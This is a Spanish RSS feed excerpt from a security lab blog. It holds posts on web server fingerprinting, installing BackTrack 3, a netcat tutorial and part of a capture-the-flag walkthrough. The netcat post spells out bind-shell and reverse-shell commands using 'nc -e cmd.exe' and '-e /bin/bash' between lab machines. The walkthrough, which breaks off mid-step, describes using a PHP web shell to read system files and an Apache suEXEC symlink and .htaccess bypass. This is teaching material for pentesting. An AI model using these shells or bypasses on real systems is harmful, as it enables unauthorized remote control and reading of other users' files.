<p style="text-align: justify;"><strong>Netcat:</strong></p>
<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). (<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat" target="_blank"><strong>Más información&#8230;</strong></a>)</p>
<p style="text-align: justify;"><strong>Httprint:</strong></p>
<p style="text-align: justify;">Httprint, de Net-Square, es un programa gratuito (no GPL) que utiliza técnicas de fuzzing para dar una estimación de la versión de servidor web que se ejecuta en un puerto. Realiza un cálculo con determinados tests pra crear una huella(fingerprint) del servidor y compararla con una base de datos de los mismos. (<a href="http://www.net-square.com/httprint/" target="_blank"><strong>Más información&#8230;</strong></a>)</p>
<p style="text-align: justify;"><strong>Netcraft:</strong></p>
<p style="text-align: justify;">Netcraft es una herramienta online para saber información sobre el host de una determinada pagina. (servidor web, nameserver, registrador, disponibilidad) (<a href="http://news.netcraft.com/" target="_blank"><strong>Más información&#8230;</strong></a>)</p>
<p style="text-align: justify;"><strong>Live HTTP headers:</strong></p>
<p style="text-align: justify;">Esta extensión para el navegador Mozilla Firefox tiene una funcionalidad muy concreta: mostrar las cabeceras HT que se cargan al navegar por Internet, y añadir además diversos datos extra interesantes. (<a href="https://addons.mozilla.org/en-US/firefox/addon/3829" target="_blank"><strong>Más información&#8230;</strong></a>)</p>
<p style="text-align: justify;">El siguiente video tutorial muestra algunos métodos utilizados para determinar la firma digital de aplicaciones web. Caso concreto el tipo y versión del servidor web haciendo uso de Netcat, Httprint, Live HTTP headers y Netcraft.</p>
<p style="text-align: center;"><script src="http://en.sevenload.com/pl/6BHIeav/445x364" type="text/javascript"></script></p>
<p>Link: <a href="http://en.sevenload.com/videos/6BHIeav-Labs-OWASP-Pruebas-de-firma-digital-de-aplicaciones-Web-netcat-Httprint-Live-HTTP-headers-y-Test-Online"><img src="http://static.sevenload.com/img/sevenload.png" alt="Labs OWASP: Pruebas de firma digital de aplicaciones Web, netcat, Httprint, Live HTTP headers y Test Online" width="66" height="10" /></a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/75201497/b4dce493/Identificacin_servidor_web_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de pruebas de firma digital de aplicaciones Web</strong></a>. (<strong>Password: </strong>www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/pruebas-de-firma-digital-de-aplicaciones-web-netcat-httprint-live-http-headers-y-test-online/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Video tutorial de instalación de BackTrack 3</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3#comments</comments>
		<pubDate>Thu, 27 Nov 2008 19:20:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Backtrack 3]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=407</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack es la herramienta indispensable para casi la totalidad de nuestros laboratorios, y los motivos ya han sido expuestos en muchas oportunidades.</p>
<p style="text-align: center;"><img class="aligncenter" title="backtrack 3" src="http://img232.imageshack.us/img232/8159/bt3qk2.jpg" alt="" width="450" height="355" /></p>
<p style="text-align: justify;">Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.</p>
<p style="text-align: justify;">BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.</p>
<p style="text-align: justify;"><span id="more-407"></span>Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org</p>
<p style="text-align: justify;">(<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Más información sobre BackTrack</strong></a>)</p>
<p style="text-align: justify;">Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/73408823/91de9988/inst_backtrack3_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de instalación de BackTrack 3 en disco duro</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Netcat</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat#comments</comments>
		<pubDate>Thu, 06 Nov 2008 21:55:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=312</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).</p>
<p style="text-align: justify;"><span id="more-312"></span>Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.</p>
<p style="text-align: justify;">Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información &#8211; Web Oficial</strong></a>)</p>
<p style="text-align: justify;">En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.</p>
<p style="text-align: justify;">Algunas de estas razones pueden ser:</p>
<ul style="text-align: justify;">
<li>Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).</li>
<li>Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).</li>
<li>Cuando necesitamos conectarnos a un servicio de red de manera manual.</li>
</ul>
<p style="text-align: justify;">El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la &#8220;Guía definitiva de Netcat&#8221;, si nos acercará un poco más a la misma.</p>
<p style="text-align: justify;">Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Identificación de Banner’s (Banderas) I</strong></a><br />
<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Scanning II</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (II de VIII)</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (III de VIII)</strong></a></p>
<p style="text-align: justify;"><strong>Ayudas y Opciones de Comandos</strong></p>
<p style="text-align: justify;"><strong>Nota:</strong> Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.</p>
<p style="text-align: justify;">Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>nc -h</strong></p>
<p style="text-align: justify;">Para lo cual obtendremos el siguiente resultado:</p>
<p style="text-align: justify;"><strong>nc -h<br />
[v1.10]<br />
connect to somewhere: nc [-options] hostname port[s] [ports] &#8230;<br />
listen for inbound: nc -l -p port [-options] [hostname] [port]<br />
options:<br />
-e prog program to exec after connect [dangerous!!]<br />
-g gateway source-routing hop point[s], up to 8<br />
-G num source-routing pointer: 4, 8, 12, &#8230;<br />
-h this cruft<br />
-i secs delay interval for lines sent, ports scanned<br />
-l listen mode, for inbound connects<br />
-n numeric-only IP addresses, no DNS<br />
-o file hex dump of traffic<br />
-p port local port number<br />
-r randomize local and remote ports<br />
-s addr local source address<br />
-t answer TELNET negotiation<br />
-u UDP mode<br />
-v verbose [use twice to be more verbose]<br />
-w secs timeout for connects and final net reads<br />
-z zero-I/O mode [used for scanning]<br />
port numbers can be individual or ranges: lo-hi [inclusive]</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img511.imageshack.us/img511/996/netcat1px6.jpg" alt="" width="450" height="540" /></p>
<p style="text-align: justify;"><strong>Identificación de Banners e información</strong></p>
<p style="text-align: justify;">Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/6339/netcat2by4.jpg" alt="" width="450" height="346" /></p>
<p style="text-align: justify;">Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.</p>
<p style="text-align: justify;"><strong>Consultando el Servidor Web que gestiona un sistema Objetivo</strong></p>
<p style="text-align: justify;">Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9316/netcat3bm2.jpg" alt="" width="450" height="366" /></p>
<p style="text-align: justify;"><strong>Netcat a la escucha sobre puertos TCP/UDP y Chat<br />
</strong></p>
<p style="text-align: justify;">Establecer a Netcat en modo &#8220;listen&#8221; (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.</p>
<p style="text-align: justify;">Vamos como establecer a Netcat en modo &#8220;listen&#8221; (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9841/netcat4dt9.jpg" alt="" width="450" height="447" /></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img509.imageshack.us/img509/3803/netcat5vm4.jpg" alt="" width="450" height="414" /></p>
<p style="text-align: justify;">La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo &#8220;listen&#8221;, veamos:</p>
<p style="text-align: justify;"><strong>nc -lvv 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img354.imageshack.us/img354/7607/netcat6kb3.jpg" alt="" width="356" height="318" /></p>
<p style="text-align: justify;">El cliente será el sistema Windows</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img361.imageshack.us/img361/9703/netcat7tx4.jpg" alt="" width="450" height="409" /></p>
<p style="text-align: justify;"><strong>Transferencia de Archivos con Netcat</strong></p>
<p style="text-align: justify;">Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Debemos ejecutar la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 &gt; salida.txt</strong></p>
<p style="text-align: justify;">El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/6551/netcat8ob1.jpg" alt="" width="395" height="321" /></p>
<p style="text-align: justify;">El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.<br />
para ello primero crearemos el archivo de texto a enviar. Veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/8930/netcat9do1.jpg" alt="" width="463" height="239" /></p>
<p style="text-align: justify;">Así se vería desde el servidor BackTrack cuando recibe los datos</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img378.imageshack.us/img378/5779/netcat10os7.jpg" alt="" width="408" height="269" /></p>
<p style="text-align: justify;">Luego procedemos a comprobar la información contenida en el envío</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img136.imageshack.us/img136/9493/netcat11np8.jpg" alt="" width="415" height="292" /></p>
<p style="text-align: justify;"><strong>Administración Remota con Netcat (Shell)<br />
</strong></p>
<p style="text-align: justify;">Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.</p>
<p style="text-align: justify;">Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 -e cmd.exe</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img243.imageshack.us/img243/2668/netcat12iu5.jpg" alt="" width="405" height="257" /></p>
<p style="text-align: justify;">Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img151.imageshack.us/img151/7813/netcat13my1.jpg" alt="" width="413" height="373" /></p>
<p style="text-align: justify;"><strong>Shell Inversa con Netcat</strong></p>
<p style="text-align: justify;">A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo &#8220;listen&#8221; y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo &#8220;Listen&#8221;.</p>
<p style="text-align: justify;">Desde Windows se establece el modo Listen:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img262.imageshack.us/img262/6366/netcat14wp3.jpg" alt="" width="343" height="255" /></p>
<p style="text-align: justify;">Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345 -e /bin/bash</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/3433/netcat15fu3.jpg" alt="" width="411" height="367" /></p>
<p style="text-align: justify;">Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/1160/netcat17ja3.jpg" alt="" width="450" height="321" /></p>
<p style="text-align: justify;">Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;">A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.</p>
<p style="text-align: justify;">Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:</p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"><strong>Crysol<br />
Netcat en la Wikipedia</strong></a><br />
<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Web Oficial de Netcat</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (VI de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-vi-de-viii#comments</comments>
		<pubDate>Mon, 01 Sep 2008 19:53:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comandos Linux]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=246</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la quinta entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 5 publicado por <a href="http://sg6-labs.blogspot.com/2008/03/secgame-1-sauron-resolucin-nivel-5.html" target="_blank"><strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/61351393/8da74e57/Solucionario_05_HackTaller_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org).</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank"></a><a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">BackTrack</a>,<a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank"></a> <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a> (en nuestro caso, <a href="http://www.hirednetwork.com/?p=138" target="_blank">C99</a>), <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">John The Ripper</a>, <a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank"><br />
</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; .<a href="http://mundogeek.net/archivos/2005/05/04/htaccess/" target="_blank">HTACCESS</a> &#8211; <a href="http://labs.dragonjar.org/comandos-habituales-en-linux" target="_blank">Comandos habituales en Linux</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211;  <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank">Shell</a>, <a href="http://es.wikipedia.org/wiki/PHP_Shell" target="_blank">Shell PHP</a>, <a href="http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/" target="_blank">Null Byte Injection</a></p>
<p style="text-align: justify;"><span id="more-246"></span>El nivel 5 es quizá uno de los momentos menos concretos de todos los que se pueden presentar. Ahora hemos conseguido ser usuarios locales del sistema, podemos ejecutar comandos, leer directorios, ver configuraciones, y podemos, en definitiva, explorar muchísimas posibilidades.</p>
<p>Sin embargo, hay que matizar algo importante, que puede servir para ahorrarnos muchas horas de trabajo inútil: si nos encontramos en un sistema actualizado, sin fallos de seguridad en el kernel y en otros servicios administrativos, es muy difícil, a menos que el administrador haya configurado algo de forma errónea, escalar privilegios directamente, hacia un usuario administrativo. ¿Qué podemos hacer entonces en estas situaciones?</p>
<p>Nuestro objetivo, en estos casos en los que ser &#8220;root&#8221; o &#8220;Administrador&#8221; no parece ser inmediato, será extraer la mayor cantidad de información del sistema, obtener el mayor número de cuentas de usuario posibles, etc.</p>
<p><strong>¿Cómo conseguir eso?</strong></p>
<p style="text-align: justify;">Primeramente, en los sistemas que tengan servicios web, nos centraremos en estos, ¿por qué?. Básicamente porque el aislamiento entre usuarios web, es quizá no complicado, pero sí tedioso. Es fácil encontrar escenarios en los que directamente podamos acceder a los directorios de otros usuarios en la web, y leer sus ficheros, porque todas estas carpetas pueden ser leídas por el usuario que ejecuta el servidor web ( apache, httpd, etc ). En otros escenarios los usuarios web estarán aislados usando cgi-wrappers. Y únicamente, en los entornos más avanzados y seguros, cada usuario web poseerá una máquina virtual o un vps, en la que sólo existirá él. En caso de no existir escenario web, otros escenarios posibles son por este orden: ficheros de configuración, ficheros temporales, ficheros de logs y permisos inseguros.</p>
<p>En este escenario que nos ocupa, relativamente común en un entorno de seguridad medio con árbol web (incluso muy común en granjas de servidores web), vamos a ver cómo se puede proceder. Lo primero, saber quiénes son los usuarios.</p>
<p><strong>blindware:x:500:500::/var/www/blindware:/bin/bash<br />
intranet:x:501:501::/var/www/intranet:/bin/bash<br />
developer:x:502:502::/home/developer:/bin/bash</strong></p>
<p>El sistema parece tener 3 usuarios. 2 de ellos, usuarios web, uno de los cuales es el usuario con el que podemos ejecutar comandos, y otro es el usuario “intranet”.</p>
<p>Podemos probar a acceder al directorio del usuario intranet (<strong>/var/www/intranet</strong>), pero rápidamente nos daremos cuenta, que poco podemos hacer, pues nos deniega el acceso. Incluso si intentamos leer <strong>/var/www</strong>, obtendremos resultado parecido, puesto que sus permisos son los siguientes:</p>
<p><strong>d&#8211;x&#8211;x&#8211;x 8 root root 4096 May 12 13:52 www</strong></p>
<p>Ésta situación es bastante común, sin embargo, hay un fichero en el sistema que nos será siempre de gran utilidad, y es la configuración del propio Apache, la cual habitualmente se encuentra desprotegida (en este caso dentro de <strong>/etc/httpd/httpd.conf</strong>).</p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin blindware@blindware.inc<br />
DocumentRoot /var/www/blindware/htdocs<br />
ServerName www.blindware.inc<br />
SuexecUserGroup blindware blindware<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p><strong>&lt;VirtualHost *:80&gt;<br />
ServerAdmin intranet@blindware.inc<br />
DocumentRoot /var/www/intranet/htdocs<br />
ServerName intranet.blindware.inc<br />
SuexecUserGroup intranet intranet<br />
&lt;Directory /&gt;<br />
Options Indexes SymLinksIfOwnerMatch ExecCGI<br />
AllowOverride All<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</strong></p>
<p>De esta configuración, lo primero que extraemos, es que los hosts están aislados mediante Apache suEXEC, lo cual hace que PHP esté configurado para ejecución en modo CGI, en vez de cómo módulo de Apache, y por ello antes necesitábamos permisos de ejecución en los ficheros PHP. Tal y como comentamos con anterioridad, no es recomendable ir reinventando la rueda a cada paso, por ello, la pregunta que nos tenemos que hacer en este punto es: ¿existe algún procedimiento público y documentado que permita sobrepasar los mecanismos de aislamiento de hosts basados en Apache suEXEC?.</p>
<p>Existe, únicamente tenemos que buscar en Google: &#8220;<strong>apache suexec</strong>&#8220;, &#8220;<strong>apache suexec bypass</strong>&#8220;, o similares y encontraremos un documento denominado &#8220;<strong>Apache suEXEC Bypass</strong>&#8221; en el cual se nos detalla de forma bastante extensa los problemas de configuración asociados a éste sistema.</p>
<p>A grandes rasgos, nosotros vamos a sacar lo más interesante del documento, para hacernos una idea de cómo podemos proceder para leer ficheros dentro del directorio web del usuario intranet.</p>
<p><strong>1.</strong> Los diferentes hosts virtuales de Apache, mediante suEXEC, lo que consiguen es que cada host ejecute comandos CGI, bajo un usuario diferente. De esta forma, por ejemplo, nosotros ejecutamos comandos con “blindware”, mientras que el vhost intranet, ejecuta comandos con el usuario “intranet”.</p>
<p><strong>2.</strong> Esto permite un esquema de aislamiento “relativamente” sencillo.</p>
<p><strong>drwxr-x&#8212; 3 blindware apache 4096 nov 25 17:00 blindware<br />
drwxr-x&#8212; 3 intranet apache 4096 nov 25 17:00 intranet</strong></p>
<p>Si nos damos cuenta, cada usuario es propietario de su directorio, y ningún otro usuario puede acceder a ellos, a excepción del usuario apache, con el que se ejecuta el servicio web. Esto &#8220;garantiza&#8221;, que aunque el usuario ejecute comandos en el sistema, ningún usuario podrá acceder al directorio de otro usuario.</p>
<p><strong>3.</strong> Esta idea, cuenta con un fallo: el enlace simbólico. Los enlaces simbólicos se pueden establecer sobre ficheros en los que no tenemos permisos. Dicho de otra forma, nosotros como usuario “blindware”, podemos enlazar cualquier fichero del usuario “intranet”, del que conozcamos su existencia.</p>
<p><strong>4.</strong> Una vez enlazado el fichero, podremos usar Apache, para leer el enlace simbólico, de esta forma, el enlace simbólico será leido con los permisos de Apache, usuario Apache, y podremos acceder a aquellos directorios a los que Apache tenga acceso, que comúnmente son todos los del árbol web, puesto que debe poder leerlos.</p>
<p><strong>5.</strong> Para que el ataque tenga éxito Apache, es así por defecto, debe estar activa la opción <strong>FollowSymLinks</strong> en Apache. Por el contrario, si la opción que se encuentra activa es <strong>SymLinksIfOwnerMatch</strong>, el ataque no se podrá realizar, puesto que Apache, únicamente seguirá enlaces que apunten a ficheros propiedad del dueño del enlace.</p>
<p><strong>6.</strong> En caso de estar activa la directiva <strong>SymLinksIfOwnerMatch</strong>, podrá ser modificada por un usuario mediante un fichero <strong>.htaccess</strong>, siempre que las opciones <strong>AllowOverride Options</strong>, o <strong>AllowOverride All</strong>, estén habilitadas.</p>
<p>A priori, parece que nos encontramos en un escenario vulnerable: se usa <strong>suEXEC</strong>, y aunque se encuentra habilitada la opción <strong>SymLinksIfOwnerMatch</strong>, también está habilitada la cláusula <strong>AllowOverride All</strong>. Por tanto, es cuestión de proceder, a través de nuestra shell en PHP según lo que vamos a describir a continuación. Un detalle importante, cuando queramos ejecutar contenido en nuestra shell PHP, cualquier instrucción que incluya caracteres mínimamente extraños, debemos hace uso de URLEncode.</p>
<p><strong>1.</strong> Lo primero que queremos hacer es escribir un fichero <strong>.htaccess</strong> que nos permita aprovecharnos de esta vulnerabilidad. La orden bien pudiera ser esta.</p>
